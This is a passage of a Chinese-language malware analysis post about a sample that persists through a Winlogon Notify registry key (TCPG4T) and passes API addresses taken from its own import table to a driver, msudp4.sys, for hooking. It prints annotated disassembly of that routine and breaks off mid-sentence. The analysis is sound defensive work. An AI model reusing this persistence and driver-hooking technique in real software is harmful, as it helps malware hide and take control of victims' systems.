分析病毒有些日子了,不过昨天见到的一个病毒还真是有点头疼。那东西释放了一个DLL和一个SYS,那个SYS是个驱动;另外,它还创建了HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\TCPG4T这个键,通过这个Winlogon Notify键让系统加载TCPG4T.DLL,这个方法以前没有见过。TCPG4T.dll做了很多事,有下载文件的,有监视注册表的,其中最厉害的就是它借助msudp4.sys这个驱动来挂接API。下面是部分代码:
push offset aNtwritevirtual ; lpProcName
.text:100048B1 push eax ; hModule
.text:100048B2 push offset aNtprotectvirtu ; lpProcName
.text:100048B7 push eax ; hModule
.text:100048B8 push offset aNtcreateproces ; lpProcName
.text:100048BD push eax ; hModule
.text:100048BE push offset aNtcreateproc_0 ; lpProcName
.text:100048C3 push eax ; hModule
.text:100048C4 push offset aLdrloaddll ; lpProcName
.text:100048C9 push eax ; hModule
.text:100048CA call GetProcAddress
.text:100048CF mov [ebp+InBuffer], eax
.text:100048D5 call GetProcAddress
.text:100048DA mov [ebp+var_C4], eax
.text:100048E0 call GetProcAddress
.text:100048E5 mov [ebp+var_C0], eax
.text:100048EB call GetProcAddress
.text:100048F0 mov [ebp+var_BC], eax
.text:100048F6 call GetProcAddress
.text:100048FB mov [ebp+var_B8], eax
.text:10004901 push offset aWininet_dll ; lpLibFileName
.text:10004906 call LoadLibraryA
.text:1000490B push offset aHttpsendreques ; lpProcName
.text:10004910 push eax ; hModule
.text:10004911 call GetProcAddress
.text:10004916 mov [ebp+var_C8], eax
.text:1000491C mov eax, offset loc_10004A01
.text:10004921 add eax, [eax+1] ; OpenProcess的IAT项
.text:10004924 add eax, 5
.text:10004927 mov eax, [eax+2]
.text:1000492A mov eax, [eax]
.text:1000492C mov [ebp+var_B4], eax
.text:10004932 mov eax, offset loc_10004A06
.text:10004937 add eax, [eax+1]
.text:1000493A add eax, 5
.text:1000493D mov eax, [eax+2]
.text:10004940 mov eax, [eax]
.text:10004942 mov [ebp+var_B0], eax
.text:10004948 mov eax, offset loc_10004A0B
.text:1000494D add eax, [eax+1]
.text:10004950 add eax, 5
.text:10004953 mov eax, [eax+2]
.text:10004956 mov eax, [eax]
.text:10004958 mov [ebp+var_78], eax
.text:1000495B mov eax, offset loc_10001E48
.text:10004960 movzx eax, ax
.text:10004963 mov [ebp+var_74], eax
.text:10004966 mov eax, offset loc_100048A7
.text:1000496B add eax, [eax+1]
.text:1000496E add eax, 5
.text:10004971 mov eax, [eax+2]
.text:10004974 mov eax, [eax]
.text:10004976 mov [ebp+var_70], eax
.text:10004979 mov eax, offset loc_10004A10
.text:1000497E add eax, [eax+1]
.text:10004981 add eax, 5
.text:10004984 mov eax, [eax+2]
.text:10004987 mov eax, [eax]
.text:10004989 mov [ebp+var_6C], eax
.text:1000498C mov eax, offset loc_10004A15
.text:10004991 add eax, [eax+1]
.text:10004994 add eax, 5
.text:10004997 mov eax, [eax+2]
.text:1000499A mov eax, [eax]
.text:1000499C mov [ebp+var_68], eax
.text:1000499F mov eax, offset loc_10004A1A
.text:100049A4 add eax, [eax+1]
.text:100049A7 add eax, 5
.text:100049AA mov eax, [eax+2]
.text:100049AD mov eax, [eax]
.text:100049AF mov [ebp+var_64], eax
.text:100049B2 mov eax, offset loc_10004A1F
.text:100049B7 add eax, [eax+1]
.text:100049BA add eax, 5
.text:100049BD mov eax, [eax+2]
.text:100049C0 mov eax, [eax]
.text:100049C2 mov [ebp+var_60], eax
.text:100049C5 mov eax, offset sub_100024C7
.text:100049CA movzx eax, ax
.text:100049CD mov [ebp+var_5C], eax
.text:100049D0 mov eax, offset sub_1000247E
.text:100049D5 movzx eax, ax
.text:100049D8 mov [ebp+var_58], eax
.text:100049DB push 0 ; lpOverlapped
.text:100049DD push offset BytesReturned ; lpBytesReturned
.text:100049E2 push 0 ; nOutBufferSize
.text:100049E4 push 0 ; lpOutBuffer
.text:100049E6 push 78h ; nInBufferSize
.text:100049E8 lea eax, [ebp+InBuffer]
.text:100049EE push eax ; lpInBuffer
.text:100049EF push 0A00h ; dwIoControlCode
.text:100049F4 push hDevice ; hDevice
.text:100049FA call DeviceIoControl
.text:100049FF leave
.text:10004A00 retn
它首先利用Windows程序通过IAT间接调用真实API的原理,从自身的IAT中取得了各个API的入口点地址:
.text:1000491C mov eax, offset loc_10004A01
.text:10004921 add eax, [eax+1] ;加上相对偏移,获得绝对地址,就是那句JMP XXXXXXXX的目标
.text:10004924 add eax, 5 ;因为JMP/CALL XXXXXXXX这类指令本身长度为5字节,目标 = 指令地址 + 5 + 相对偏移
.text:10004927 mov eax, [eax+2] ;获得IAT地址
.text:1000492A mov eax, [eax] ;读出API入口
.text:1000492C mov [ebp+var_B4], eax ;压入缓冲区
这段就是获得入口地址的代码。接着,它把这些地址放进78h字节的输入缓冲区,通过DeviceIoControl(控制码0A00h)交给msudp4.sys这个驱动